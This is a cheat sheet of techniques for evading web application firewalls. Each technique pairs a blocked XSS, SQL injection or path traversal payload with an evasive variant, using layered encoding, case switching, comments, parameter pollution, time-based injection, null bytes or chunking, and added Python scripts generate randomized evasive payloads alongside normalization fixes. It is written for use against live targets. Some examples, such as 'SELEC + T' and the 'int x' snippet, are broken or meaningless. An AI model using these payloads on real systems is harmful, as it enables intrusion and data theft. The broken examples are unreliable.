The following is a list of very specific techniques you can use to work around (evade) firewalls, chiefly web application firewalls. Keep in mind that there are roughly a dozen types of firewalls and each technique works against only a portion of them, usually those that pattern-match on request content without first decoding and normalizing it.
Each technique below has a short explanation of how to do it, a basic request that a WAF signature would typically block, and an updated request that may bypass the WAF. None of these is guaranteed: a WAF that canonicalizes input before matching defeats most of the encoding tricks outright, so test each one against the actual target.
How to do it:
Encode special characters in the payload using URL encoding (percent-encoding). This evades a WAF that matches its signatures against the raw request without percent-decoding it first; the application server decodes the parameter before using it, so the payload is intact by the time it reaches the page.
Blocked original request:
<script>alert('XSS')</script>
Updated with URL encoding:
%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
How to do it:
Convert characters in the payload to their JavaScript Unicode escapes (\u003C for <, \u003E for >). This only works where the payload lands inside a JavaScript string that the page later evaluates or writes into the DOM; the browser's HTML parser does not decode \u escapes, so the variant below will not execute if it is reflected directly into HTML.
Blocked original request:
<script>alert('XSS')</script>
Updated with Unicode encoding:
\u003Cscript\u003Ealert('XSS')\u003C/script\u003E
How to do it:
Use HTML entities to encode characters in the payload. The browser decodes entities in HTML text and attribute values, so a payload reflected into an attribute, or into text that the page later inserts with innerHTML, renders correctly while a WAF matching on the literal string misses it. Entities are not decoded inside <script> blocks, so this does not help when the injection point is already inside JavaScript.
Blocked original request:
<script>alert('XSS')</script>
Updated with HTML entities:
&lt;script&gt;alert(&#39;XSS&#39;)&lt;/script&gt;
How to do it:
Combine multiple encoding techniques (e.g., URL encoding on top of HTML entities) in a single payload. A WAF that applies only one decoding pass sees &#39; rather than a quote and misses the signature, while the application percent-decodes the parameter and the browser then decodes the entity.
Blocked original request:
<script>alert('XSS')</script>
Updated with mixed encoding:
%3Cscript%3Ealert%28%26%2339%3BXSS%26%2339%3B%29%3C%2Fscript%3E
How to do it:
Mix uppercase and lowercase characters in tag and keyword names. HTML tag names and most SQL keywords are case-insensitive to the parser, so the payload still works, but a case-sensitive signature written for <script> does not match <ScrIpT>.
Blocked original request:
<script>confirm()</script>
Updated with case-switching:
<ScrIpT>confirm()</sCRiPt>
How to do it:
Insert inline comments within the payload to break up the patterns the WAF is looking for. SQL parsers treat /* ... */ as whitespace, so SELECT/*comment*/ * parses exactly like SELECT *, while a signature written with a literal space between SELECT and * does not match.
Blocked original request:
SELECT * FROM users WHERE id=1;
Updated with comments:
SELECT/*comment*/ * FROM users WHERE id=1;
How to do it:
Send multiple parameters with the same name in a single request (HTTP parameter pollution). Frameworks disagree on which value wins: some take the first occurrence, some the last, some concatenate or build an array. If the WAF inspects a different occurrence than the one the application uses, the malicious value passes through.
Blocked original request:
GET /search?q=malicious_query
Updated with parameter pollution:
GET /search?q=benign_query&q=malicious_query
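The parameter-pollution case above, modelled with Python's standard query parser, as an added example that is not code from the original page. The request target is the page's own; the "malicious" substring check stands in for a real signature and is an assumption. It shows a first-occurrence WAF passing a request whose last-occurrence application receives the bad value, and the two fixes: inspect every instance, or reject duplicate parameter names outright.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed request target taken from the page's example.
POLLUTED = "/search?q=benign_query&q=malicious_query"


def values(target, name):
    """Every occurrence of a parameter, in order, as a list."""
    query = urlsplit(target).query
    return parse_qs(query, keep_blank_values=True).get(name, [])


def first_wins(target, name):
    """Servlet getParameter() style: the first occurrence is used."""
    vals = values(target, name)
    return vals[0] if vals else None


def last_wins(target, name):
    """PHP $_GET and several JavaScript frameworks: the last occurrence overwrites earlier ones."""
    vals = values(target, name)
    return vals[-1] if vals else None


def looks_malicious(value):
    # Stand-in for a real signature; constructed for the example.
    return "malicious" in value


def waf_first_only_blocks(target):
    """A WAF that evaluates only the first instance of each parameter."""
    v = first_wins(target, "q")
    return v is not None and looks_malicious(v)


def waf_all_instances_blocks(target):
    """The fix on the WAF side: evaluate every instance."""
    return any(looks_malicious(v) for v in values(target, "q"))


def app_rejects_duplicates(target, name):
    """The fix on the application side: refuse ambiguous requests outright."""
    return len(values(target, name)) > 1


if __name__ == "__main__":
    print("WAF (first only) blocks:", waf_first_only_blocks(POLLUTED))
    print("app (last wins) uses:   ", last_wins(POLLUTED, "q"))
    print("WAF (all instances):    ", waf_all_instances_blocks(POLLUTED))
    print("app rejects duplicates: ", app_rejects_duplicates(POLLUTED, "q"))
```

Which occurrence a given stack uses is a property of the framework, not the HTTP specification, so when testing a target start by sending a harmless duplicated parameter and observing which value is echoed back.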
How to do it:
Use double encoding (encode the percent sign of an already-encoded sequence, so . becomes %2e and then %252e) to bypass WAF rules that decode only once. This only pays off when something behind the WAF decodes a second time, for example a reverse proxy that decodes before handing the path to an application that decodes again.
Blocked original request:
GET /../../etc/passwd
Updated with double encoding:
GET /%252e%252e%252f%252e%252e%252fetc%252fpasswd
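The double-encoding case above, as an added example that is not code from the original page. The two encoded paths are the page's; the document root (/var/www) and the assumption that the backend decodes the path twice are constructed for the demonstration. A single-decode WAF lets the double-encoded path through, the modelled backend opens /etc/passwd, and the hardened check decodes until the value stops changing before applying the same traversal rule.

```python
import posixpath
from urllib.parse import unquote

# Constructed paths: the page's single- and double-encoded traversal examples.
SINGLE_ENCODED = "/%2e%2e%2f%2e%2e%2fetc%2fpasswd"
DOUBLE_ENCODED = "/%252e%252e%252f%252e%252e%252fetc%252fpasswd"
WEBROOT = "/var/www"  # assumed document root for the example


def waf_single_decode_blocks(path):
    """A WAF that percent-decodes exactly once and then looks for a traversal sequence."""
    return "../" in unquote(path)


def backend_resolves(path, webroot=WEBROOT):
    """Models a proxy that decodes once and an application that decodes the result again,
    then joins it to the document root. Two decoding layers are the precondition for
    double encoding to pay off."""
    decoded = unquote(unquote(path))
    return posixpath.normpath(webroot + decoded)


def canonicalize(path, max_rounds=5):
    """Decode until the value stops changing; refuse input that never settles."""
    current = path
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            return decoded
        current = decoded
    raise ValueError("too many encoding layers")


def hardened_waf_blocks(path):
    """Same rule as the naive WAF, applied to the canonical form."""
    return "../" in canonicalize(path)


if __name__ == "__main__":
    for p in (SINGLE_ENCODED, DOUBLE_ENCODED):
        print(f"{p}\n  naive WAF blocks:    {waf_single_decode_blocks(p)}"
              f"\n  hardened WAF blocks: {hardened_waf_blocks(p)}"
              f"\n  backend would open:  {backend_resolves(p)}")
```

The canonicalize() loop is the general fix: a rule evaluated on a half-decoded value is a rule the attacker can route around by adding one more layer, so decode to a fixed point first and treat input that does not converge as hostile.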
How to do it:
Modify the User-Agent or Referer header. Some WAF policies whitelist browser-like user agents, apply weaker rule sets to them, or treat requests carrying an internal Referer as trusted, so a request that is blocked under a scanner-looking User-Agent may pass when it looks like a browser. (The header is spelled Referer in HTTP, a misspelling the standard kept.)
Blocked original request:
GET /admin HTTP/1.1
User-Agent: NormalBrowser
Updated with a custom User-Agent:
GET /admin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
How to do it:
Use time delays in SQL injection to infer information from the database when the application shows no output and the usual boolean or UNION payloads are blocked. The delayed response is the signal, so the result is read from timing rather than from the page body. The syntax below is Microsoft SQL Server's; MySQL uses SLEEP() and PostgreSQL uses pg_sleep().
Blocked original request:
GET /search?q=' OR 1=1; --
Updated with time-based SQL injection:
GET /search?q='; IF (1=1) WAITFOR DELAY '00:00:05'; --
How to do it:
Modify parameters in HTTP requests, particularly by moving the payload out of the query string and into the POST body, a cookie, or a header, to bypass WAF rules that are only applied to GET parameters. The example below only shows the shape of a tampered POST request; the bypass comes from the WAF not inspecting the body with the same rules it applies to the query string.
Blocked original request:
POST /login HTTP/1.1
username=admin&password=123456
Updated with parameter tampering:
POST /login HTTP/1.1
username=admin&password=wrong_password
How to do it:
Split the payload across multiple TCP segments or HTTP chunks (Transfer-Encoding: chunked) so that no single unit the WAF inspects contains the whole signature. This only works against inspection that does not reassemble the stream before matching; the web server always reassembles, so the application receives the intact payload. Splitting across separate HTTP requests does not work, since the application never joins them back together.
Blocked original request:
<script>alert('XSS')</script>
Updated with payload fragmentation (the two fragments are sent separately):
<script>aler
t('XSS')</script>
How to do it:
Analyze the WAF's responses (block pages, status codes, rule IDs in error messages, timing) to identify which payloads and paths are being blocked and adjust accordingly; on an authorized engagement the WAF logs themselves show exactly which rule fired. Often a rule covers one spelling of a path and not an equivalent one that reaches the same resource.
Blocked original request:
GET /admin HTTP/1.1
Updated based on log analysis:
GET /admin.php HTTP/1.1
How to do it:
Use wildcard characters so the query still matches the target row without containing the literal value a signature keys on. LIKE 'adm%' matches the admin row, but a rule looking for the string 'admin' does not fire.
Blocked original request:
SELECT * FROM users WHERE username='admin';
Updated with wildcard obfuscation:
SELECT * FROM users WHERE username LIKE 'adm%';
How to do it:
Insert characters that break the tokens the WAF's signature expects. The target's parser must still accept the result, and this is where the example below falls down: no SQL dialect accepts a keyword split by a space and a plus sign, so SELEC + T is rejected by the database as well as (possibly) missed by the WAF. In practice, token breaking means varying the separators between keywords, using comments, tabs or newlines, rather than splitting the keywords themselves.
Blocked original request:
SELECT * FROM users WHERE id=1;
Updated with token breaking (note: this form does not parse as SQL):
SELEC + T * FROM users WHERE id=1;
How to do it:
Insert tabs (\t) or line feeds (\n) between the tokens of a payload to disrupt WAF signatures written with a literal space. HTML and SQL parsers treat any run of whitespace as a separator, so the payload still works.
Blocked original request:
<script>alert('XSS')</script>
Updated with tabs and line feeds:
<script>\n\talert('XSS')</script>
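The comment, token-breaking and tab/newline variants of the page's SQL query, executed against an in-memory SQLite table and checked by two toy WAF rules, as an added example that is not code from the original page. The users table, its two rows and the signature (a regex for "SELECT * FROM" with a literal space) are constructed for the demonstration. It shows that the comment and whitespace variants run and evade the raw-string rule, that the SELEC + T form is rejected by the database, and that stripping comments and collapsing whitespace before matching, which is what the SQL parser does anyway, catches the working variants.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory database standing in for the page's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "admin"), (2, "bob")])
    return conn


# The page's variants of the same query.
VARIANTS = {
    "plain":       "SELECT * FROM users WHERE id=1;",
    "comment":     "SELECT/*comment*/ * FROM users WHERE id=1;",
    "tab_newline": "SELECT\n\t*\nFROM\tusers\nWHERE\nid=1;",
    "token_break": "SELEC + T * FROM users WHERE id=1;",
}


def executes(conn, sql):
    """Run the statement; return the rows, or None if the database rejects it."""
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return None


# Hypothetical signature written against the plain form, with a literal space between tokens.
SIGNATURE = re.compile(r"SELECT \* FROM", re.IGNORECASE)


def naive_waf_blocks(sql):
    """Match the signature against the request text as received."""
    return bool(SIGNATURE.search(sql))


def normalize_sql(sql):
    """Do what the SQL parser does before tokenizing: drop block comments and
    collapse every run of whitespace (space, tab, newline) to a single space."""
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)
    return re.sub(r"\s+", " ", sql).strip()


def normalizing_waf_blocks(sql):
    """The same signature after normalization."""
    return bool(SIGNATURE.search(normalize_sql(sql)))


if __name__ == "__main__":
    db = make_db()
    for name, sql in VARIANTS.items():
        print(f"{name:12} runs={executes(db, sql) is not None!s:5} "
              f"naive_block={naive_waf_blocks(sql)!s:5} "
              f"normalized_block={normalizing_waf_blocks(sql)}")
```

SQLite is used here because it ships with Python; MySQL additionally honours /*! ... */ version comments whose contents are executed rather than ignored, which is a further evasion that a normalizer written for standard comments will not see.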
How to do it:
Use uninitialized or rarely used variables in the payload to confuse the WAF's detection. This matters in interpreted contexts where an undefined variable expands to nothing, such as a shell, so that a command name can be padded with variable references a signature does not expect; the generic example below is only a schematic of moving the assignment around.
Blocked original request:
int x = 1; return x;
Updated with uninitialized variable:
int x; return x = 1;
How to do it:
Introduce newline characters within a payload, here between the tag and the function call, to break up a signature that expects the opening tag and the call on the same line.
Blocked original request:
<script>alert('XSS')</script>
Updated with newline characters:
<script>
alert('XSS')
</script>
How to do it:
Insert characters into the payload that the target application or browser will ignore but that break the WAF's string match. The null byte (%00) is the classic example: a WAF written in C may treat it as the end of the string and stop matching, while the application strips or ignores it. Whether the browser accepts a tag name containing a null byte depends on the browser; older Internet Explorer versions did, current browsers do not, so test against the actual target.
Blocked original request:
<script>alert('XSS')</script>
Updated with junk characters:
<scri%00pt>alert('XSS')</scri%00pt>
How to do it:
Generate payloads dynamically so that each request looks different and a fixed signature cannot match. In the example below the function name is built at runtime with String.fromCharCode, so the literal string alert never appears in the request; the decoded name is concatenated with the call before eval, since a string is not itself callable. Randomizing case, spacing and which characters are encoded on every send keeps the payload from matching a signature written against an earlier capture.
Blocked original request:
<script>alert('XSS')</script>
Updated with dynamic payload generation:
<script>eval(String.fromCharCode(97,108,101,114,116)+"('XSS')")</script>
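A generator for the dynamic payloads described above, combined with the case-switching trick, as an added example that is not code from the original page. It builds the JavaScript source alert('XSS') with String.fromCharCode at runtime and randomizes tag-name case and the whitespace before the eval call, so every call returns a different request. The signature (a regex for "alert(") is an assumption; the folding step in decode_from_char_code() shows the normalization a WAF needs to see through this, and the block also covers the case-switching technique earlier on the page.

```python
import json
import random
import re


def from_char_code(text):
    """Build a JavaScript String.fromCharCode(...) expression that evaluates to text."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in text) + ")"


def random_case(text, rng):
    """Randomize the case of each character (HTML tag names are case-insensitive)."""
    return "".join(c.upper() if rng.random() < 0.5 else c.lower() for c in text)


def generate_payload(rng):
    """Return a fresh-looking payload on every call. The JavaScript source alert('XSS')
    is rebuilt at runtime by String.fromCharCode and handed to eval, so the literal
    string alert never appears in the request; tag-name case and spacing vary as well."""
    code = from_char_code("alert('XSS')")
    gap = rng.choice(["", " ", "\t", "\n"])  # whitespace between eval and ( is legal JS
    return f"<{random_case('script', rng)}>eval{gap}({code})</{random_case('script', rng)}>"


# Hypothetical signature derived from an earlier capture of the plain payload.
SIGNATURE = re.compile(r"alert\s*\(")


def raw_signature_blocks(payload):
    """A WAF that matches the captured signature against the request as sent."""
    return bool(SIGNATURE.search(payload))


def decode_from_char_code(payload):
    """Fold every String.fromCharCode(...) back into the JavaScript string literal it produces."""
    def fold(m):
        codes = [int(n) for n in m.group(1).split(",") if n.strip()]
        return json.dumps("".join(chr(n) for n in codes))
    return re.sub(r"String\.fromCharCode\(([\d,\s]*)\)", fold, payload)


def normalizing_signature_blocks(payload):
    """The same signature after folding fromCharCode and lower-casing the request."""
    return bool(SIGNATURE.search(decode_from_char_code(payload).lower()))


if __name__ == "__main__":
    rng = random.Random()
    for _ in range(3):
        p = generate_payload(rng)
        print(f"raw_block={raw_signature_blocks(p)!s:5} "
              f"normalized_block={normalizing_signature_blocks(p)!s:5} {p!r}")
```

The generated markup is valid in a browser: eval receives the string "alert('XSS')" and executes it. Folding fromCharCode is one of several JavaScript-level normalizations (unescape(), atob(), string concatenation) a WAF must apply, which is why signature matching on script bodies is weak and output encoding in the application remains the real XSS fix.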
The firewall evasion techniques above generally target firewalls that perform deep packet inspection or application-level filtering, such as Web Application Firewalls (WAFs) and Next-Generation Firewalls (NGFWs). Their effectiveness varies with the type of firewall, its configuration, and its specific capabilities, in particular whether it decodes and canonicalizes traffic before matching rules against it.
Not all techniques are universally effective across all firewall types. The encoding, comment and whitespace tricks are aimed at application-layer firewalls like WAFs that match on request content; fragmentation and header manipulation can also affect simpler devices that filter at the network or transport layer. Understanding the capabilities and configuration of the specific firewall in front of the target is essential before applying any of them.